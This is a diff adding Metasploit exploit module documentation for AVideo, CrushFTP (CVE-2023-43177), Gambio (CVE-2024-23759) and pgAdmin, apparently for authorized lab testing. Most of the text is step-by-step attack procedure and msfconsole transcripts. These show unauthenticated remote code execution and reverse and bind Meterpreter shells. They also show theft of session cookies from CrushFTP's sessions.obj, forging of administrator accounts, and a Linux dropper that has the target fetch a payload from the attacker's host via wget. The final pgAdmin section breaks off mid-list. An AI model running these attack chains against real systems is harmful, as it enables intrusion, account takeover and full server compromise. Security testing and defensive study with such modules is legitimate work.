+After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
+
+msf6 > use 3
+[*] Additionally setting TARGET => Unix In-Memory
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > options
+
+Module options (exploit/multi/http/avideo_wwbnindex_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      nhjkrZakk        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix In-Memory
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set rhosts 192.168.100.20
+rhosts => 192.168.100.20
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lhost eth0
+lhost => 192.168.100.10
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set lport 1337
+lport => 1337
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > set fetch_srvport 5000
+fetch_srvport => 5000
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (3045380 bytes) to 192.168.100.20
+[*] Meterpreter session 1 opened (192.168.100.10:1337 -> 192.168.100.20:52936) at 2024-04-04 23:08:05 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.100.20
+OS           : Ubuntu 20.04 (Linux 5.4.0-169-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+[*] Shutting down session: 1
+
+[*] 192.168.100.20 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > use 2
+[*] Additionally setting TARGET => PHP In-Memory
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.10:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Detected vulnerable AVideo version: 12.9
+[*] Sending stage (39927 bytes) to 192.168.100.20
+[*] Meterpreter session 2 opened (192.168.100.10:1337 -> 192.168.100.20:36258) at 2024-04-04 23:08:44 +0200
+
+meterpreter > getuid
+Server username: www-data
+```
@@ -0,0 +1,304 @@
+
+## Vulnerable Application
+
+This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.
+
+It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.
+
+### Attack Details
+
+The module will first get an anonymous session by querying an non-existing page and set a few session properties through specifically crafted HTTP headers. The `user_log_file`, `user_log_path` and `user_log_path_custom` properties are set in a way that results in moving any file to any location on the server. This primitive is used to retrieve the CrushFTP cache session file (`sessions.obj`), which contains all the active session cookies.
+
+From there, the module will check if one of these session cookies belongs to an administrator and upload a payload (`.jar` file) to a temporary location on the server. It will then send a request to the `testDB` API, specifying the path of the SQL driver pointing to the payload. This will result in the execution of the payload in the context of the user running CrushFTP, usually root on Linux or SYSTEM on Windows.
+
+In case no administrator sessions are found in the session file, the module will attempt to escalate privileges of any non-administrative sessions. It will abuse the fact that CrushFTP supports filesystem-based accounts, which are defined in folders containing a `user.XML` file. This is done by taking advantage of the arbitrary file move primitive to upload and move a specifically crafted `user.XML` file to the right location.
+
+Note that since the session cookies and other information are retrieved from the CrushFTP session file and because this file is created by the server every 10 minutes approximately, the module will attempt to download it repeatedly every 30 seconds by default (can be changed by setting the `SESSION_FILE_DELAY` option).
+
+More details on these techniques [here](https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/).
+
+
+### Install CrushFTP
+
+
+Since the vulnerable version of CrushFTP is not available anymore on the official website, it can be downloaded from [here](https://github.com/the-emmons/CVE-2023-43177/releases/tag/crushftp_software) (reposted by the original research).
+Then, you can follow the installation steps from the official website (https://www.crushftp.com/download.html).
+
+### Setup a new user to test the privilege escalation attack (optional)
+
+This module can be tested with only an administrator logged into the application. To test the privilege escalation attack, a non-administrator user needs to be set up.
+
+- Click on `Admin` and `User Management`.
+- Click the `+ Add` button to create a new user (provide a username and a password).
+- With this new user selected, in the `User Settings` pane, select a location in the server file system that will be the root directory for this user. You can create a new folder by clicking the first button on the left hand side. Go ahead and create multiple subdirectories also.
+- Drag & drop the root folder from the left pane to the right pane and navigate to a folder you want to be writable. The root folder and its subfolders are read-only by default. Once you pick one folder, select the `Upload` and `Delete` permissions on the right hand side.
+- Click `Save`.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use multi/http/crushftp_rce_cve_2023_43177`
+1. Do: `set target <target>`
+1. Do: `set payload <payload>`
+1. Do: `run rhosts=<target address>`
+
+
+You will need to have an active user's session on the server. For this, you can log into the application with an administrator account or with a non-privileged user. The latter will trigger the privilege escalation routine.
+Since the module needs to download the cache session file one or two times, depending on if privilege escalation is required, this can take up to 20 minutes to get remote code execution. So, make sure the user that is authenticated has not logged out or the session timed out until the exploit finishes.
+
+
+## Options
+
+### SESSION_FILE_DELAY
+The delay in seconds between attempts to download the session file (default 30).
+
+
+## Scenarios
+
+### Target 0 (Java) against CrushFTP version 10.5.0_3 on Windows
+
+#### With an active administrator session
+```
+msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.54 verbose=true
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking CrushFTP Server
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711129530820_ogdYwds2NKkSxZoAGigNyNLtyFrphL
+[*] Checking if the attack primitive works
+[*] Logging out session cookie `1711129530820_ogdYwds2NKkSxZoAGigNyNLtyFrphL`
+[+] The target appears to be vulnerable.
+[*] Downloading the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711129532554_mudHsRJWeg1AH7x0PyZzux9uffDBOr
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9bce0d5c08-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711129532554_mudHsRJWeg1AH7x0PyZzux9uffDBOr`
+[*] Looking for the valid sessions
+[*] Found 4 session cookies in the session file
+[*] Cookie `1711129187087_HwakJiMBcOOnUrEbe6hgbTuwqH7UVZ` is valid session (username: crushadmin)
+[*] Cookie `1711115282718_bh0KMR52mszSUEnVJT7u699mcIIlf3` is not valid
+[*] Cookie `1711115284720_HC3QlMqFXpqoY4iSEYzXUJOThVD7SX` is not valid
+[*] Cookie `1711115283356_XYu6nd3kaL4zcjtOurFUNXknYprRmu` is not valid
+[*] Checking if user crushadmin is an admin (cookie: 1711129187087_HwakJiMBcOOnUrEbe6hgbTuwqH7UVZ)
+[+] It is an admin! Let's create a temporary admin account
+[+] Administrator account created: username=f605ec51de, password=e5864cea12
+[*] [do_login] Logging in with username `f605ec51de` and password `e5864cea12`
+[*] Uploading payload .jar file `c32e.jar` to C:/Users/Public/c32e.jar
+[*] Triggering the payload
+[*] Cleanup the temporary admin account
+[*] Started bind TCP handler against 192.168.101.54:4444
+[*] Sending stage (57971 bytes) to 192.168.101.54
+[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_9bce0d5c08-js
+[*] Meterpreter session 11 opened (10.4.227.33:57574 -> 192.168.101.54:4444) at 2024-03-22 18:46:25 +0100
+[!] This exploit may require manual cleanup of 'C:/Users/Public/c32e.jar' on the target
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer        : SRV-STD
+OS              : Windows Server 2022 10.0 (amd64)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : java/windows
+```
+
+#### With an active non-privileged session (privilege escalation)
+```
+msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.54 verbose=true
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking CrushFTP Server
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130383791_FsmZz0FlGiiiYLl7V8qhICxtzfmQLN
+[*] Checking if the attack primitive works
+[*] Logging out session cookie `1711130383791_FsmZz0FlGiiiYLl7V8qhICxtzfmQLN`
+[+] The target appears to be vulnerable.
+[*] Downloading the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130385529_gfYIp4KJlwx6R5dy1JWcLhZZq9rOJS
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711130385529_gfYIp4KJlwx6R5dy1JWcLhZZq9rOJS`
+[*] Looking for the valid sessions
+[*] Found 1 session cookies in the session file
+[*] Cookie `1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T` is valid session (username: msfuser)
+[*] Checking if user msfuser is an admin (cookie: 1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T)
+[*] Could not find any admin session or the admin account creation failed
+[*] Attempting privilege escalation with session cookie {:cookie=>"1711130148838_IQCFIDkPBuRaLAVq2KI9D1hAlfgh0T", :username=>"msfuser"}
+[*] Looking for a directory with write permissions
+[+] Found a writable directory: /home/readonly/writable1
+[*] Uploading the egg file `4daf4b7923`
+[*] Uploading `user.XML` to /home/readonly/writable1/user.XML
+[*] Looking for the egg in the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130396337_KcYDlC0SZA19Z2uiWqw8dDyU0bVMO1
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
+[+] Session file downloaded
+[*] Session file has not changed yet, skipping
+[*] Logging out session cookie `1711130396337_KcYDlC0SZA19Z2uiWqw8dDyU0bVMO1`
+[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
+[*] Looking for the egg in the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130429011_YzjufB5IlVeRSuqRdcJdMjXfDWBQwx
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711130429011_YzjufB5IlVeRSuqRdcJdMjXfDWBQwx`
+[*] Found the egg at FILE://C:/CrushFTP10/home/readonly/writable1/4daf4b7923 in the session file
+[+] Found path `C:/CrushFTP10/home/readonly/writable1/` and it is Windows
+[+] Found the file system path: C:/CrushFTP10/home/readonly/writable1/
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130431330_KQjve6ieSt8nNrl4uJ5L7vmVmsEXsD
+[*] The forged user will be `4a5b85eeb9`
+[*] Moving user.XML from C:/CrushFTP10/home/readonly/writable1/ to `4a5b85eeb9` home folder and elevate privileges
+[*] Logging out session cookie `1711130431330_KQjve6ieSt8nNrl4uJ5L7vmVmsEXsD`
+[*] Logging into the elevated account
+[*] [do_login] Logging in with username `4a5b85eeb9` and password `9adccf3732`
+[+] Logged in! Now let's create a temporary admin account
+[*] Logging out session cookie `1711130433073_bRLLcJRdeSHJTIEcRAOpMKzMYL0zLa`
+[+] Administrator account created: username=ec71181f81, password=63524a9c6c
+[*] [do_login] Logging in with username `ec71181f81` and password `63524a9c6c`
+[*] Uploading payload .jar file `ea2c.jar` to C:/Users/Public/ea2c.jar
+[*] Triggering the payload
+[*] Cleanup the temporary admin account
+[*] Started bind TCP handler against 192.168.101.54:4444
+[*] Sending stage (57971 bytes) to 192.168.101.54
+[+] Deleted C:/CrushFTP10/home/readonly/writable1/4daf4b7923
+[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_9f9371966b-js
+[*] Meterpreter session 12 opened (10.4.227.33:61332 -> 192.168.101.54:4444) at 2024-03-22 19:00:49 +0100
+[!] This exploit may require manual cleanup of 'C:/Users/Public/ea2c.jar' on the target
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer        : SRV-STD
+OS              : Windows Server 2022 10.0 (amd64)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : java/windows
+```
+
+### Target 0 (Java) against CrushFTP version 10.5.0_3 on Linux
+
+#### With an active administrator session
+```
+msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.96 verbose=true
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking CrushFTP Server
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130989170_opHdY12lePB0nORZlJxUqdgU9zEBuZ
+[*] Checking if the attack primitive works
+[*] Logging out session cookie `1711130989170_opHdY12lePB0nORZlJxUqdgU9zEBuZ`
+[+] The target appears to be vulnerable.
+[*] Downloading the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711130990882_In2JvArUAjORTeJGGXf67Ql3gpUMC8
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_040ed0cbc9-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711130990882_In2JvArUAjORTeJGGXf67Ql3gpUMC8`
+[*] Looking for the valid sessions
+[*] Found 1 session cookies in the session file
+[*] Cookie `1711130936989_ZongxaZC0kfML3XvdU3d2RSL6CG76D` is valid session (username: crushadmin)
+[*] Checking if user crushadmin is an admin (cookie: 1711130936989_ZongxaZC0kfML3XvdU3d2RSL6CG76D)
+[+] It is an admin! Let's create a temporary admin account
+[+] Administrator account created: username=998a245fc4, password=28d3804cfd
+[*] [do_login] Logging in with username `998a245fc4` and password `28d3804cfd`
+[*] Uploading payload .jar file `d204.jar` to /var/tmp/d204.jar
+[*] Triggering the payload
+[*] Cleanup the temporary admin account
+[*] Started bind TCP handler against 192.168.101.96:4444
+[*] Sending stage (57971 bytes) to 192.168.101.96
+[+] Deleted /var/tmp/d204.jar
+[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_040ed0cbc9-js
+[*] Meterpreter session 13 opened (10.4.227.33:63705 -> 192.168.101.96:4444) at 2024-03-22 19:10:03 +0100
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ip-10-10-0-10
+OS              : Linux 6.5.0-1014-aws (amd64)
+Architecture    : x64
+System Language : en
+Meterpreter     : java/linux
+```
+
+
+#### With an active non-privileged session (privilege escalation)
+```
+msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > exploit rhosts=192.168.101.96 verbose=true
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking CrushFTP Server
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711131564348_M6LZ3JOkdP3AHww0Xsr8nVdNLVDPOv
+[*] Checking if the attack primitive works
+[*] Logging out session cookie `1711131564348_M6LZ3JOkdP3AHww0Xsr8nVdNLVDPOv`
+[+] The target appears to be vulnerable.
+[*] Downloading the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711131566040_JXiaRnA4jAMCIqnwiSbWGxPf7pAzHD
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711131566040_JXiaRnA4jAMCIqnwiSbWGxPf7pAzHD`
+[*] Looking for the valid sessions
+[*] Found 1 session cookies in the session file
+[*] Cookie `1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F` is valid session (username: msfuser)
+[*] Checking if user msfuser is an admin (cookie: 1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F)
+[*] Could not find any admin session or the admin account creation failed
+[*] Attempting privilege escalation with session cookie {:cookie=>"1711131525923_krJ319nYz6GDz4VXkOfUQjbkHzaG0F", :username=>"msfuser"}
+[*] Looking for a directory with write permissions
+[+] Found a writable directory: /home/readonly/writable1
+[*] Uploading the egg file `e5d3f50f45`
+[*] Uploading `user.XML` to /home/readonly/writable1/user.XML
+[*] Looking for the egg in the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711131576980_gK0M9IhcvhrhXVrAwRqS1rd8ESJ7ry
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
+[+] Session file downloaded
+[*] Session file has not changed yet, skipping
+[*] Logging out session cookie `1711131576980_gK0M9IhcvhrhXVrAwRqS1rd8ESJ7ry`
+[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
+[*] Looking for the egg in the session file
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711131609587_sKMgxtPNJg78LMAQkx7uLVEOUGyD4G
+[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js/`
+[+] Session file downloaded
+[*] Logging out session cookie `1711131609587_sKMgxtPNJg78LMAQkx7uLVEOUGyD4G`
+[*] Found the egg at FILE://home/ubuntu/CrushFTP10/home/readonly/writable1/e5d3f50f45 in the session file
+[+] Found path `/home/ubuntu/CrushFTP10/home/readonly/writable1/` and it is Unix-like
+[+] Found the file system path: /home/ubuntu/CrushFTP10/home/readonly/writable1/
+[*] Getting a new anonymous session
+[*] Anonymous session cookie: 1711131611903_PY71NprjquBlrPlZhYdnyk5JHGNfzo
+[*] The forged user will be `9721e30b7c`
+[*] Moving user.XML from /home/ubuntu/CrushFTP10/home/readonly/writable1/ to `9721e30b7c` home folder and elevate privileges
+[*] Logging out session cookie `1711131611903_PY71NprjquBlrPlZhYdnyk5JHGNfzo`
+[*] Logging into the elevated account
+[*] [do_login] Logging in with username `9721e30b7c` and password `7ae6ef77cf`
+[+] Logged in! Now let's create a temporary admin account
+[*] Logging out session cookie `1711131613590_9nhaTwXZIH9hpyGCnJkgCd9vKAZrEI`
+[+] Administrator account created: username=4c07767049, password=1267096390
+[*] [do_login] Logging in with username `4c07767049` and password `1267096390`
+[*] Uploading payload .jar file `926f.jar` to /var/tmp/926f.jar
+[*] Triggering the payload
+[*] Cleanup the temporary admin account
+[*] Started bind TCP handler against 192.168.101.96:4444
+[*] Sending stage (57971 bytes) to 192.168.101.96
+[+] Deleted /home/ubuntu/CrushFTP10/home/readonly/writable1/e5d3f50f45
+[+] Deleted /var/tmp/926f.jar
+[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_4cf0853fb7-js
+[*] Meterpreter session 14 opened (10.4.227.33:50007 -> 192.168.101.96:4444) at 2024-03-22 19:20:23 +0100
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : ip-10-10-0-10
+OS              : Linux 6.5.0-1014-aws (amd64)
+Architecture    : x64
+System Language : en
+Meterpreter     : java/linux
+```
+
+
+
@@ -0,0 +1,231 @@
+## Vulnerable Application
+
+A Remote Code Execution vulnerability in Gambio online webshop version `4.9.2.0` and lower allows remote attackers
+to run arbitrary commands via unauthenticated HTTP POST requests. Gambio version 3 is not vulnerable.
+The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
+which ultimately allows an attacker to execute remote code on affected systems.
+
+The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.
+
+This module has been tested with:
+* Gambio online webshop `4.7.2.0` on Ubuntu `22.04` running in VirtualBox `7.0.14 r161095 (Qt5.15.2)`.
+
+## Installation steps to install the Gambio Online Webshop
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the Gambio Webshop software from [here](https://www.dmsolutions.de/gambio-download.html).
+* Unzip the package `Gambio v4.7.2.0.zip` and install the Gambio Online Webshop on your Linux Virtual Machine
+* using the installation instructions provided in the ZIP file. Do not use a Windows VM (see Limitations section).
+* When installed, you should be able to access the Webshop  either thru `HTTP` port 80 or `HTTPS` port 443
+* depending on your configuration settings.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/gambio_unauth_rce_cve_2024_23759`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename without extension of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > info
+
+       Name: Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
+     Module: exploit/multi/http/gambio_unauth_rce_cve_2024_23759
+   Platform: PHP, Unix, Linux
+       Arch: php, cmd, x64, x86
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-01-19
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  usd Herolab
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>    0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.201.25   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
+                                        it/basics/using-metasploit.html
+  RPORT      80               yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The Gambia Webshop endpoint URL
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if
+                                         left unset.
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
+                                       on the local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+Payload information:
+
+Description:
+  A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower
+  allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.
+  The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
+  which ultimately allows an attacker to execute remote code on affected systems.
+  The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
+  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+  to sensitive information.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-23759
+  https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759
+  https://herolab.usd.de/en/security-advisories/usd-2023-0046/
+
+
+View the full module info with the info -d command.
+```
+
+### Target 0 - PHP native `php/meterpreter/reverse_tcp` session
+```msf
+msf6 > use exploits/multi/http/gambio_unauth_rce_cve_2024_23759
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 192.168.201.25
+rhosts => 192.168.201.25
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
+rport => 80
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.25
+[+] Deleted GmacadJjQQOXMux.php
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:60348) at 2024-03-24 09:15:50 +0000
+
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www
+meterpreter > exit
+```
+
+### Target 1 - Unix Command `cmd/unix/reverse_bash` session
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
+target => 1
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted UJoQmnhL.php
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:50728) at 2024-03-24 09:17:46 +0000
+
+uname -a
+Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
+exit
+```
+
+### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
+```msf
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
+target => 2
+msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:80 can be exploited.
+[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.8:8080/ODk0gcrj
+[*] Client 192.168.201.25 (Wget/1.21.2) requested /ODk0gcrj
+[*] Sending payload to 192.168.201.25 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 192.168.201.25
+[+] Deleted gJlhCqCPLrR.php
+[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:46426) at 2024-03-24 09:18:23 +0000
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.25
+OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www
+meterpreter > exit
+```
+
+## Limitations
+Gambio is also supported on Windows systems, however the admin access seems to be broken on the vulnerable versions.
+This causes the exploit not to run successfully.
+Another dependency is that one or more tax countries should be defined in the configuration of the application, otherwise
+guest users can not be created causing the exploit to fail. The default setup of the application has at least one tax country defined.
@@ -0,0 +1,94 @@
+## Vulnerable Application
+pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow a
+pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python object to
+execute code within the context of the target application.
+
+This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are
+specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using
+pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted
+using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are
+provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique
+only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound
+guest access be enabled.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/pgadmin_session_deserialization`
+1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options
